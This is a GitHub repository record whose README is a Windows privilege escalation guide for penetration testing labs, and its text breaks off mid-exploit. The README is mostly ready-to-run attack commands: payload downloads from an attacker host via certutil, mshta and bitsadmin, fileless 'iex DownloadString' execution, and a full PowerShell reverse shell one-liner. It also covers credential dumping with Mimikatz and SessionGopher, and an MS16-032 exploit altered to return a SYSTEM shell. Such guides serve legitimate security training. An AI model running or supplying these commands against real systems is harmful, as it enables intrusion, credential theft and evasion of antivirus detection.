{"id":13539876,"url":"https://github.com/frizb/windows-privilege-escalation","last_synced_at":"2025-04-02T06:31:39.426Z","repository":{"id":39635470,"uuid":"91092743","full_name":"frizb/Windows-Privilege-Escalation","owner":"frizb","description":"Windows Privilege Escalation Techniques and Scripts","archived":false,"fork":false,"pushed_at":"2020-03-25T22:35:02.000Z","size":107,"stargazers_count":841,"open_issues_count":3,"forks_count":186,"subscribers_count":24,"default_branch":"master","last_synced_at":"2025-03-13T13:39:32.507Z","etag":null,"topics":["kali-linux","oscp","windows-enumeration","windows-hacking","windows-privilege-escalation","windows-scripts"],"latest_commit_sha":null,"homepage":null,"language":"Batchfile","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/frizb.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-05-12T13:09:50.000Z","updated_at":"2025-03-12T19:28:02.000Z","dependencies_parsed_at":"2022-08-09T15:07:34.553Z","dependency_job_id":null,"html_url":"https://github.com/frizb/Windows-Privilege-Escalation","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation/manifests","owner_url":"https://
repos.ecosyste.ms/api/v1/hosts/GitHub/owners/frizb","download_url":"https://codeload.github.com/frizb/Windows-Privilege-Escalation/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246768100,"owners_count":20830605,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["kali-linux","oscp","windows-enumeration","windows-hacking","windows-privilege-escalation","windows-scripts"],"created_at":"2024-08-01T09:01:33.356Z","updated_at":"2025-04-02T06:31:34.416Z","avatar_url":"https://github.com/frizb.png","language":"Batchfile","funding_links":[],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"3ed50213c2818f1455eff4e30372c542\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"a9494547a9359c60f09aea89f96a2c83\"\u003e\u003c/a\u003e后渗透","\u003ca id=\"4c2095e7e192ac56f6ae17c8fc045c51\"\u003e\u003c/a\u003e提权\u0026\u0026PrivilegeEscalation"],"readme":"# Windows-Privilege-Escalation\nHere is my step-by-step Windows privilege escalation methodology. This guide assumes you are starting with a very limited shell like a webshell, netcat reverse shell or a remote telnet connection. 
\n\n## First things first and quick wins\nDo some basic enumeration to figure out who we are, what OS this is, what privileges we have and what patches have been installed.\n\n```\nwhoami\nnet user \u003cusername\u003e\nsysteminfo\nnet config Workstation\nnet users\n```\nWhat is running on the machine?\nIf we are able to run WMIC we can pull rich details on the services and applications running:\n```\nwmic service list full \u003e services.txt\nwmic process \u003e processes.txt\n```\nOr alternatively:\n```\ntasklist \u003e processes.txt\n```\nHas a Windows auto-login password been set?\n```\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"\n```\nDump a tree of all the folders / files on the HDD:\n```\ntree c:\\ \u003e c:\\users\\public\\folders.txt\n```\nor for a list of files:\n```\ndir /s c:\\ \u003e c:\\users\\public\\files.txt\n```\n\n## Uploading files to the Windows machine\nSometimes we will want to upload a file to the Windows machine in order to speed up our enumeration or to escalate privileges.  Often you will find that uploading files is not needed at all if you are able to execute PowerShell that is hosted on a remote webserver (we will explore this more in the Upgrading your Windows Shell, Windows Enumeration and Windows Exploits sections).  Uploading files increases the chances of being detected by antivirus and leaves an unnecessary data trail behind.\nWe will look at 4 ways of uploading files to a remote Windows machine from Kali Linux:\n1. VBScript HTTP Downloader\n2. PowerShell HTTP Downloader\n3. Python HTTP Downloader\n4. FTP Downloader\n\n*NOTE* There are MANY more ways to move files to and from a Windows machine, most can be found on the LOLBAS project:\nhttps://lolbas-project.github.io/\n\nMost of these will require that we create a simple local webserver on our Kali box to serve the files (NOTE: I have had issues running this command within TMUX for whatever reason... 
so don't run it in TMUX).\nI like to use the Python Simple HTTP Server:\n```\nroot@kali:~/Documents/Exploits/WindowsPRIVZ# python -m SimpleHTTPServer 80\n```\nOr the Python pyftpdlib FTP Server (again, don't run it from TMUX):\n```\napt-get install python-pyftpdlib\nroot@kali:~/Documents/Exploits/WindowsPRIVZ# python -m pyftpdlib -p 21\n```\n\n### Uploading Files with VBScript\nIn my experience, VBScript is one of the easiest methods of transferring files to a remote Windows machine. The only downside is that the file size you can transfer is rather limited.  I often have trouble transferring anything over 1 MB using this method and have to fall back on other methods (windows-privesc-check2.exe is much too large to transfer using this method).\nFirst let's test to see if we can run VBScript:\n```\necho WScript.StdOut.WriteLine \"Yes we can run vbscript!\" \u003e testvb.vbs\n```\nNow we run it to see the results:\n```\ncscript testvb.vbs\n```\nIf you see the following message, we are good to go with VBScript:\n```\nC:\\Users\\Test\u003ecscript testvb.vbs\nMicrosoft (R) Windows Script Host Version 5.812\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nYes we can run vbscript!\n```\nIf you see either of the following messages, you should move on to PowerShell:\n```\nC:\\temp\u003ecscript testvb.vbs\nThis program is blocked by group policy. For more information, contact your system administrator.\nC:\\temp\u003etestvb.vbs\nAccess is denied.\n```\n\nNow we can create a very simple downloader script by copying and pasting this single line of code into your Windows command line. 
I have tried to create a VBS script to download files from a remote webserver with the least possible number of lines of VBS code and I believe this is it.\nIf the target is an older version of Windows (Windows 8 or Server 2012 and below), use the following script:\n```\nCMD C:\\\u003e echo dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")  \u003e dl.vbs \u0026echo dim bStrm: Set bStrm = createobject(\"Adodb.Stream\")  \u003e\u003e dl.vbs \u0026echo xHttp.Open \"GET\", WScript.Arguments(0), False  \u003e\u003e dl.vbs \u0026echo xHttp.Send \u003e\u003e dl.vbs \u0026 echo bStrm.type = 1 \u003e\u003e dl.vbs \u0026echo bStrm.open \u003e\u003e dl.vbs \u0026 echo bStrm.write xHttp.responseBody \u003e\u003e dl.vbs \u0026echo bStrm.savetofile WScript.Arguments(1), 2 \u003e\u003e dl.vbs\n```\nIf the target is a newer version of Windows (Windows 10 or Server 2016), try the following code:\n```\nCMD C:\\\u003e echo dim xHttp: Set xHttp = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")  \u003e dl.vbs \u0026echo dim bStrm: Set bStrm = createobject(\"Adodb.Stream\")  \u003e\u003e dl.vbs \u0026echo xHttp.Open \"GET\", WScript.Arguments(0), False  \u003e\u003e dl.vbs \u0026echo xHttp.Send \u003e\u003e dl.vbs \u0026echo bStrm.type = 1 \u003e\u003e dl.vbs \u0026echo bStrm.open \u003e\u003e dl.vbs \u0026echo bStrm.write xHttp.responseBody \u003e\u003e dl.vbs \u0026echo bStrm.savetofile WScript.Arguments(1), 2 \u003e\u003e dl.vbs\n```\n\nNow try to download a file to the local path:\n```\nCMD C:\\\u003e cscript dl.vbs \"http://10.10.10.10/archive.zip\" \".\\archive.zip\"\n```\n\n### Uploading Files with CertUtil.exe\nI've found that CertUtil can be quite reliable when all else seems to fail.\n\n```\ncertutil.exe -urlcache -split -f http://10.10.10.10/exploit.exe\n```\n\n### Transferring Files using MSHTA\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA). 
And it can also be used to transfer files :D\nHTTP:\n```\nC:\\\u003emshta http://10.10.10.10/badthings.exe\n```\n\nFTP:\n```\nC:\\\u003emshta ftp://10.10.10.10:21/badthings.exe\n```\n\n### Transferring Files using Bitsadmin\nBackground Intelligent Transfer Service (BITS) is a component of Microsoft Windows XP and later versions of the operating system, which facilitates asynchronous, prioritized, and throttled transfer of files between machines using idle network bandwidth. BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center.\n```\nC:\\\u003ebitsadmin /transfer badthings http://10.10.10.10:80/badthings.exe c:\\users\\public\\payload.exe\n```\n\n### Uploading Files with PowerShell\n\nTest to see if we can run PowerShell:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"get-host\"\n```\n\nTest to see if we can run PowerShell Version 2:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Version 2 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"$PSVersionTable\"\n```\n\nTry to download a file from a remote server to the Public Downloads folder from the Windows command line:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/exploit.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\exploit.exe\\\")\"\n```\n\nOr from a PowerShell... 
shell (no quote escaping is needed at the PowerShell console):\n```powershell\nPS C:\\\u003e (New-Object System.Net.WebClient).DownloadFile(\"http://10.10.10.10/exploit.exe\", \"C:\\Users\\Public\\Downloads\\exploit.exe\")\n```\n\n### Uploading Files with Python\nSometimes a Windows machine will have development tools like Python installed.\nCheck for Python:\n```\npython -h\n```\n\nDownload a file using Python:\n```\npython -c \"import urllib.request; urllib.request.urlretrieve('http://10.10.10.10/cat.jpg', 'C:\\\\Users\\\\Public\\\\Downloads\\\\cat.jpg');\"\n```\n\n### Uploading Files with Perl\nSometimes a Windows machine will have development tools like Perl installed.\nCheck for Perl:\n```\nperl -v\n```\nDownload a file using Perl:\n```\nperl -le \"use File::Fetch; my $ff = File::Fetch-\u003enew(uri =\u003e 'http://10.10.10.10/nc.exe'); my $file = $ff-\u003efetch() or die $ff-\u003eerror;\"\n```\n\n### Uploading Files with FTP\nAfter starting the pyftpdlib FTP server (`python -m pyftpdlib -p 21`) on Kali, you can try connecting using the Windows FTP client:\n```\nC:\\Users\\pwnd\u003eftp 10.10.10.10\nConnected to 10.10.10.10\n220 pyftpdlib 1.5.3 ready.\nUser (10.10.15.31:(none)): anonymous\n331 Username ok, send password.\nPassword: anonymous\n\n230 Login successful.\nftp\u003e ls\ndir\n421 Active data channel timed out.
\n```\nIf you are seeing a 421 timeout when you try to send a command, it is likely because your connection is being blocked by the Windows firewall. The Windows command-line ftp.exe supports FTP active mode only. In active mode, the server has to connect back to the client to establish the data connection for a file transfer.\n\nYou can check to see if the remote machine has WinSCP.exe installed. WinSCP is capable of connecting to an FTP server using passive mode and will not be blocked by the firewall.\n\n### Transferring Files via SMB using Impacket\nKali comes loaded with the incredible Impacket library, which is a Swiss army knife of network protocols... just awesome.  You can easily create an SMB share on your local Kali machine and move files between Kali and Windows with ease.\nhttps://github.com/SecureAuthCorp/impacket\n\nFirst we will set up the SMB share on Kali like so (the first argument is the share name, the second the folder to share):\n```\nroot@kali:~# impacket-smbserver smbshare /root/Desktop\nImpacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n```\n\nConfirm it is up and running using Net View on the Windows command line:\n```\nC:\\Users\\Null\u003enet view \\\\192.168.0.49\nShared resources at \\\\192.168.0.49\n\n(null)\n\nShare name  Type  Used as  Comment\n\n-------------------------------------------------------------------------------\nsmbshare    Disk\nThe command completed successfully.\n```\nThen we can transfer files from the command line as if it were a normal folder:\n```\nC:\\Users\\Admin\u003edir \\\\192.168.0.49\\smbshare\nC:\\Users\\Admin\u003ecopy \\\\192.168.0.49\\smbshare\\loot.zip .
\n```\nBy far the most interesting feature of the SMB share method is that you can execute files directly over the SMB share without copying them to the remote machine (fileless execution is so hot right now):\n```\nC:\\Users\\Admin\u003e\\\\192.168.0.49\\smbshare\\payload.exe\n```\n\nA fancy trick I learned from IppSec is to create a mapped drive to a remote SMB share like so:\n```\nnet use y: \\\\192.168.0.49\\smbshare\ny:\ndir\n```\n## Execute a remote shell dropper\nOften, you can leverage PowerShell to execute a remotely hosted PowerShell script which contains a shell dropper (generated by the platform of your choosing).\n\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle hidden -NonInteractive -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))\"\n```\n\nThere are also some not-so-well documented PowerShell argument shortcuts, so you can use things like -w rather than -WindowStyle (handy for smaller payloads):\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni -nop -i None -ex Bypass -c \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))\"\n```\n\n## Upgrading your Windows Shell\nYou might find that you are connected with a limited shell such as a web shell, netcat shell or Telnet connection that simply is not cutting it for you. Here are a few one-liners you can use to upgrade your shell:\n\n### Upgrade Shell with PowerShell Nishang\nNishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetration Tests. 
The scripts were written based on requirements the author encountered during real Penetration Tests.\n\n```bash\nroot@kali:~/test# git clone https://github.com/samratashok/nishang.git\nCloning into 'nishang'...\nremote: Enumerating objects: 1612, done.\nremote: Total 1612 (delta 0), reused 0 (delta 0), pack-reused 1612\nReceiving objects: 100% (1612/1612), 5.87 MiB | 6.62 MiB/s, done.\nResolving deltas: 100% (1010/1010), done.\nroot@kali:~/test# cd nishang/\nroot@kali:~/test/nishang# cd Shells/\nroot@kali:~/test/nishang/Shells# echo Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 4444 \u003e\u003e Invoke-PowerShellTcp.ps1\nroot@kali:~/test/nishang/Shells# python -m SimpleHTTPServer 80\n```\nNow open up a netcat listener on Kali:\n```bash\nnc -nlvp 4444\n```\nAnd execute the remote PowerShell script hosted on your Kali SimpleHTTPServer:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))\"\n```\n\n### Upgrade Windows Command Line with a PowerShell One-liner Reverse Shell\nYou can run this one-liner from the remote Windows command prompt to skip the file upload step entirely (again, be sure to update the IP and port):\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026{$client = New-Object System.Net.Sockets.TCPClient(\\\"10.10.10.10\\\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + \\\"PS \\\" + (pwd).Path + \\\"^\u003e \\\";$sendbyte = 
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}\"\n```\n\n### Netcat Reverse Shell One-liners for Windows\nSometimes it is helpful to create a new Netcat session from an existing limited shell, webshell or unstable (short-lived) remote shell.\n\n\n\n# Windows Enumeration\n*NOTE* There are many executables that could provide privilege escalation if they are being run by a privileged user, most can be found on the incredible LOLBAS project:\nhttps://lolbas-project.github.io/\n\n## Automated Windows Enumeration Scripts\nWe are also going to look at a few automated methods of performing Windows enumeration, including:\n* windows-privesc-check\n* Sherlock\n* Watson\n* JAWS\n* Seatbelt\n\n### Running Windows Privesc Check (windows-privesc-check)\nThe Windows Privesc Check is a very powerful tool for finding common misconfigurations in a Windows system that could lead to privilege escalation.  It has not been updated for a while, but it is still as effective today as it was 5 years ago. The downside of this script is that it was written in Python and if the target system does not have Python installed, you will need to use an executable version that has a Python interpreter built in.  
Having to include Python in the package makes the executable version pretty large, coming in at a whopping 7.14 MB!!\n\nFirst we will need to clone the latest version to our environment:\n```bash\nroot@kali:~/tools# git clone https://github.com/pentestmonkey/windows-privesc-check\nCloning into 'windows-privesc-check'...\nremote: Enumerating objects: 1232, done.\nremote: Total 1232 (delta 0), reused 0 (delta 0), pack-reused 1232\nReceiving objects: 100% (1232/1232), 34.79 MiB | 4.61 MiB/s, done.\nResolving deltas: 100% (897/897), done.\n```\nNext we will need to set up a simple Python HTTP webserver in Kali to host the file so the remote Windows box can download it:\n```bash\nroot@kali:~/tools# cd windows-privesc-check/\nroot@kali:~/tools/windows-privesc-check# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nNow we will need to transfer the file to our remote Windows box:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/windows-privesc-check2.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\windows-privesc-check2.exe\\\")\"\n```\nAnd now we run the executable on the remote machine. I like to run it with all audits enabled like so:\n```\nC:\\Users\\Admin\u003ecd ..\nC:\\Users\u003ecd Public\nC:\\Users\\Public\u003ecd Downloads\nC:\\Users\\Public\\Downloads\u003ewindows-privesc-check2.exe --audit -a -o report\nwindows-privesc-check v2.0svn198 (http://pentestmonkey.net/windows-privesc-check)...\n```\nThe windows-privesc-check will create a detailed HTML report and a text-based report for your review.\n\n\n\n### Running Sherlock\nSherlock is a PowerShell library with a number of privilege escalation checkers built in.\nWe can stage and run Sherlock on a remote HTTP server so the file never needs to hit the remote server's HDD.
\n```bash\nroot@kali:~test# git clone https://github.com/rasta-mouse/Sherlock.git\nCloning into 'Sherlock'...\nremote: Enumerating objects: 3, done.\nremote: Counting objects: 100% (3/3), done.\nremote: Compressing objects: 100% (3/3), done.\nremote: Total 75 (delta 0), reused 2 (delta 0), pack-reused 72\nUnpacking objects: 100% (75/75), done.\nroot@kali:~test# cd Sherlock/\nroot@kali:~test/Sherlock# ls\nLICENSE  README.md  Sherlock.ps1\nroot@kali:~test/Sherlock# echo Find-AllVulns \u003e\u003e Sherlock.ps1\nroot@kali:~test/Sherlock# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nNow we can run this from the remote Windows CMD shell:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1'))\"\n```\nOr from a Windows PowerShell:\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Sherlock.ps1')\n```\n\n### Running Watson\nSherlock has been superseded by a .NET Windows enumeration tool called Watson, which is frequently updated by the author.\nIt is a bit trickier to deploy and use, as you need to compile it yourself and match the version of .NET with the target system's version.\n\nFirst, on the target system we will need to check the versions of .NET that have been installed by navigating to the .NET framework folder and poking around:\n```\ncd\\Windows\\Microsoft.NET\\Framework\\\ndir /s msbuild\n```\nOnly active versions of .NET will have msbuild.exe.\nMake note of the available versions and use that to compile a version of Watson that targets the remote Windows machine.\nDownload the latest version of Watson from GitHub:\n```\ngit clone https://github.com/rasta-mouse/Watson.git\n```\nAnd open it using Visual Studio.
In the Solution Explorer, click Properties and modify the \"Target Framework:\" value to align with the remote Windows machine's version of the .NET framework. It will prompt you to reopen the project. Once the project has reloaded, build the project in Release mode (CTRL + SHIFT + B).\n\nNext we will copy our Watson.exe to our Kali instance and set up a simple Python HTTP webserver in Kali to host the file so the remote Windows box can download it:\n```bash\nroot@kali:~/tools# cd Watson/\nroot@kali:~/tools/Watson# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nNow we will need to transfer the compiled Watson.exe file to our remote Windows box:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/Watson.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\Watson.exe\\\")\"\n```\nAnd now we run the executable on the remote machine:\n```\nC:\\Users\\Admin\u003ecd ..\nC:\\Users\u003ecd Public\nC:\\Users\\Public\u003ecd Downloads\nC:\\Users\\Public\\Downloads\u003eWatson.exe\n```\n\n### Running JAWS - Just Another Windows (Enum) Script\nJAWS is another PowerShell library that was built with privilege escalation of the OSCP lab machines in mind.\nWe can stage and run JAWS on a remote HTTP server so the file never needs to hit the remote server's HDD.
\n```bash\nroot@kali:~test# git clone https://github.com/411Hall/JAWS\n```\nNow we can run this from the remote Windows CMD shell:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/jaws-enum.ps1'))\"\n```\nOr from a Windows PowerShell:\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/jaws-enum.ps1')\n```\nAnd we should see the following output start to appear:\n```\nRunning J.A.W.S. Enumeration\n        - Gathering User Information\n        - Gathering Processes, Services and Scheduled Tasks\n        - Gathering Installed Software\n```\n\n### FireEye Session Gopher\nLeveraging credentials is still one of the most common ways of privilege escalation in Windows environments. Session Gopher is a PowerShell script designed to automatically harvest credentials from commonly used applications.\n\nTo run Session Gopher, we will first need to pull down the latest version from the FireEye GitHub repository:\n```bash\ngit clone https://github.com/fireeye/SessionGopher\nCloning into 'SessionGopher'...\nremote: Enumerating objects: 48, done.\nUnpacking objects: 100% (48/48), done.\nremote: Total 48 (delta 0), reused 0 (delta 0), pack-reused 48\n```\nNext we can serve it up on our local Kali instance by using the simple Python HTTP server:\n```bash\nroot@kali:~/tools# cd SessionGopher/\nroot@kali:~/tools/SessionGopher# ls\nREADME.md  SessionGopher.ps1\nroot@kali:~/tools/SessionGopher# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nFinally we can filelessly execute it from our remote Windows shell:\n```cmd\n@\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/SessionGopher.ps1')); 
Invoke-SessionGopher -Thorough\"\n```\nOr from a Windows PowerShell (the script only defines the function, so we invoke it afterwards):\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/SessionGopher.ps1'); Invoke-SessionGopher -Thorough\n```\nOr we can download and run it:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/SessionGopher.ps1\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\SessionGopher.ps1\\\")\"\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026 { . C:\\Users\\Public\\Downloads\\SessionGopher.ps1; Invoke-SessionGopher -Thorough }\"\n```\n## Running Mimikatz\nMimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.
\nhttps://github.com/gentilkiwi/mimikatz\n\n### Running traditional (binary) Mimikatz\nThe original and most frequently updated version of Mimikatz is the binary executable, which can be found here:\nhttps://github.com/gentilkiwi/mimikatz/releases\n\nFirst we will need to download a Mimikatz binary and copy it to the remote machine:\n```bash\nroot@kali:~/test# wget https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip\n--2018-10-16 15:14:49--  https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip\nroot@kali:~/test# unzip mimikatz_trunk.zip\n```\nNow we will need to copy the 3 files (from the win32 or x64 folder, depending on the OS) required to run Mimikatz to the remote server:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/mimidrv.sys\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\mimidrv.sys\\\"); (New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/mimikatz.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\mimikatz.exe\\\"); (New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/mimilib.dll\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\mimilib.dll\\\")\"\n```\nNow, if we don't have an overly interactive shell, we will want to execute Mimikatz without the built-in CLI by passing the correct parameters to the executable.
We use the log parameter to also log the clear-text password results to a file (just in case we are unable to see the output).\n```\nmimikatz log version \"sekurlsa::logonpasswords\" exit\n```\nOtherwise we can use the Mimikatz shell to get the passwords:\n```\nmimikatz.exe\nmimikatz # privilege::debug\nPrivilege '20' OK\nmimikatz # sekurlsa::logonpasswords\n```\n\n\n### Running PowerShell Mimikatz\nThe PowerShell version is not as frequently updated, but can be loaded into memory without ever hitting the HDD (fileless execution).  This version simply reflectively loads the Mimikatz binary into memory, so we could probably update it ourselves without much difficulty.\n\n```bash\nwget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1\n```\nFileless execution of Mimikatz from a remotely hosted server:\n```powershell\nPS C:\\\u003e IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds\n```\n\n## Windows Kernel Exploits\n\n\n### MS16-032\nIf the remote machine appears to be vulnerable to MS16-032, we can execute a PowerShell script from a remote server to exploit it.\n```\nTitle      : Secondary Logon Handle\nMSBulletin : MS16-032\nCVEID      : 2016-0099\nLink       : https://www.exploit-db.com/exploits/39719/\nVulnStatus : Appears Vulnerable\n```\nGet the PowerShell script from FuzzySecurity's GitHub, add an invoke to the end of the script and share the folder using the Python SimpleHTTPServer:\n\n```bash\nroot@kali:~test# git clone https://github.com/FuzzySecurity/PowerShell-Suite.git\nCloning into 'PowerShell-Suite'...\nremote: Enumerating objects: 378, done.\nremote: Total 378 (delta 0), reused 0 (delta 0), pack-reused 378\nReceiving objects: 100% (378/378), 5.94 MiB | 2.06 MiB/s, done.\nResolving deltas: 100% (179/179), done.\nroot@kali:~test# cd PowerShell-Suite/\nroot@kali:~test/PowerShell-Suite# echo Invoke-MS16-032 \u003e\u003e Invoke-MS16-032.ps1
\nroot@kali:~test/PowerShell-Suite# python -m Simple\nSimpleDialog        SimpleHTTPServer    SimpleXMLRPCServer  \nroot@kali:~test/PowerShell-Suite# python -m SimpleHTTPServer 80\n```\nThe default version of the MS16-032 script will create a Pop-up CMD.exe window on the remote machine. Unfortunatly, we cannot access this from a limited shell... BUT we can modify the exploit to call a reverse shell.  Its pretty easy to modify it to call a reverse powershell that will connect back to our machine with a System shell.  We will need to modify line 330 of the exploit (the ip address and port will need to be updated of course):\n```powershell\n\t\t# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED\n\t\t#$CallResult = [Advapi32]::CreateProcessWithLogonW(\n\t\t#\t\"user\", \"domain\", \"pass\",\n\t\t#\t0x00000002, \"C:\\Windows\\System32\\cmd.exe\", \"\",\n\t\t#\t0x00000004, $null, $GetCurrentPath,\n\t\t#\t[ref]$StartupInfo, [ref]$ProcessInfo)\n\n\t\t# Modified to create a Powershell reverse shell \n\t\t$CallResult = [Advapi32]::CreateProcessWithLogonW(\n\t\t\t\"user\", \"domain\", \"pass\",\n\t\t\t0x00000002, \n\t\t\t'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', \n\t\t\t'-NoProfile -InputFormat None -ExecutionPolicy Bypass 